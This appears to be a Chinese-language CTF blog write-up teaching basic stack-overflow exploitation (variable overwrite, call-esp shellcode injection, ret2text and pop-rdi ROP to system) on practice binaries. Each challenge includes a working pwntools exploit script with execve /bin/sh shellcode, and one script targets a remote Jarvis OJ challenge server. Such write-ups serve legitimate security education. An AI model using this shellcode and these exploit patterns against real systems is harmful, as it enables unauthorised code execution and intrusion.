前言

    今天心情不错，人最大的敌人真的就是自己！！！

    好久没学PWN和逆向了，今天写一篇关于CTF中PWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN，分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型，其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。

 满足函数条件类型

    很low的命名~///这种类型就是通过栈溢出使函数栈内满足某种条件则执行自带的system函数的类型，下面是此类型题目的例子：

    题目：bof

    放入IDA中查看：

    可以看到存在get()危险函数，可接收任意长度的输入并存到变量s的地址&s中。当变量a1等于 0xcafebabe即可，可以看到字符s距离ebp为0x2c，则距离形参a1为0x2c+0x8=52u。则payload如下：

from pwn import *

p = process('./bof')

payload = 52 * 'A' + p32(0xcafebabe)

p.recvuntil('overflow me :')
p.sendline(payload)
p.interactive()

运行结果如下：

使用shellcode类型

    32bit程序传参方式是将参数从右到左依次入栈，同时构造call指令时需要伪造PUSH EIP指令。

    题目一：stack2

    首先用file命令看一下文件为32位的elf文件：

    其次使用checksec查看软件的防护措施：

    没有防护，拖入IDA分析，可以看到危险函数strcpy()：

    &dest的EIP偏移量为0x14 + 0x4 = 24u，使用gdb打开程序，查找函数栈中call esp或jmp esp的地址以便call esp到我们的shellcode起始地址上：

    选择call esp地址为0x08048577，payload如下：

from pwn import *

p = process('./stack2')

shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

callesp = 0x08048577

payload = 24 * 'A' + p32(callesp) + shellcode

p.recvuntil('please input password:')
p.sendline(payload)
p.interactive()

    脚本运行如下：

    题目二：stack2

    注意：使用shellcode类型的有两种溢出方式，第一种是将shellcode溢出到溢出点函数栈外面，第二种是溢出在溢出点函数栈内部，但是由于每次加载地址都会变，所以可能十次溢出只能成功两次。

    将程序拖入IDA中查看，存在危险函数，但是首先程序中无system函数及/bin/sh或cat flag等敏感参数，其次在gdb中使用ropsearch "call esp"不管用，，，同时每次程序的溢出点地址都暴露出来了：

    通过程序泄露出的溢出点的地址，可以保证每次都能将shellcode的起始地址溢出到返回地址以执行，payload如下：

from pwn import *

p = process('./level1')

shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

recv = p.recv(23)
buf_addr = recv[14:-1]
payload = shellcode + 'A' * (140 - len(shellcode))  + p32(int(buf_addr,16))

p.sendline(payload)
p.interactive()

     脚本运行结果如下：

 

自带system函数类型

64bit：

    题目一：bugku_pwn2

    首先查看文件类型为64bit且无防护措施：

    拖入IDA64中发现了read()危险函数，可以通过此函数进行栈溢出操作：

    同时发现有getshell函数：

   思路一：思路为溢出函数地址到EIP即可 ，而溢出点到EIP返回地址的偏移量为0x30 + 0x8 = 56u此处可以写getshell的地址，也可以写system的地址，不过首地址要写压入参数的指令的地址。下图分别为getshell函数地址与system('cat flag')的地址:

 

     注意：如果使用call system(‘cat flag’)执行的话，必须要在0x400769 将cat flag压入rdi中的edi中进行传参，如果直接40076E是无参数的。同时指令是按顺序执行的，也就是执行完mov edi, 'cat flag'后会继续执行 call _system。 

    下面的payload中以getshell函数的地址为例： 

from pwn import *

p = process('./pwn2')

system_addr = 0x400751
payload = 'A' * 56 + p64(system_addr)

p.recvuntil('say something?')
p.sendline(payload)
p.interactive()

    运行后执行了cat flag:

     思路二：另一种做法是自己给system函数添加参数，由于64位程序前七个参数从左到右一次使用寄存器传参，首先需要找到指令pop rdi指令进行参数的调整：

需要将pop rdi + p64(& cat flag) + system()溢出到返回地址上，则payload如下：

from pwn import *

p = process('./pwn2')

system_addr = 0x40076E
arg_addr = 0x400857
pop_rdi = 0x4007e3

payload = 'A' * 56 + p64(pop_rdi) + p64(arg_addr) + p64(system_addr)

p.recvuntil('say something?')
p.sendline(payload)
p.interactive()

    运行如下： 

 题目二：bugku_pwn4

    放入IDA64中查看，发现read()危险函数：

    查看函数发现system()函数，其他函数没啥意义，查一下字符串：

    发现”$0“，注意，$0相当于bin/sh。也就是system('$0') == system('bin/sh') 。那么做题思路就是给system函数中传入$0参数即可。使用ROPgadget --binary "pwn4" --string ’\$0‘来查看字符串$0的地址：

     查找pop rdi的地址位0x4007d3。溢出点距返回地址位0x10 + 0x8 = 24u

    payload如下：

from pwn import *

p = process('./pwn4')

pop_rdi = 0x4007d3
arg_addr = 0x60111f
system_addr = 0x40075A

payload = 'A' * 24 + p64(pop_rdi) + p64(arg_addr) + p64(system_addr)

p.recvuntil('Come on,try to pwn me')
p.sendline(payload)
p.interactive()

    运行如下：

 题目三：Jarvis OJ_tell me something

    拖入IDA64中查看发现有危险函数get()与函数goodgame()，只需要将goodgame函数地址溢出到返回地址执行即可，写payload后怎么都无法执行，后来看了一下汇编，发现有一个坑，正常call 函数都是push rbp  mov rbp,rsp  sub rsp xxx。

但是这个程序没有进行push rbp：（注：此处直接rsp减 88h，距离rip直接为88h。反汇编使用rbp - 88h表示，尽管没有push rbp！！！）

    所以溢出点距离返回值的偏移不用再加0x8即可，payload如下：

 

from pwn import *

p = remote('pwn.jarvisoj.com',9876)

system = 0x400620

payload = 'A' * 136 + p64(system)

p.recvuntil('Input your message:')
p.sendline(payload)
p.interactive()

     运行如下：

32bit：

题目一：Jarvis OJ_level2

    拖入IDA查看发现危险函数read()，查找字符串/bin/sh的地址及system函数的地址。由于程序时32bit的，所以传参的时候需要伪造EIP返回地址才能执行system函数，payload构造姿势是：溢出到返回地址 + call system + 伪造EIP（‘aaaa’） + arg。

payload构造如下：

from pwn import *

p = process('./level2')

sys_addr = 0x8048320
arg_addr = 0x804A024

payload = 'A' * 140 + p32(sys_addr) + 'nEIP' + p32(arg_addr)

p.recvuntil('Input:')
p.sendline(payload)
p.interactive()

    脚本执行如下：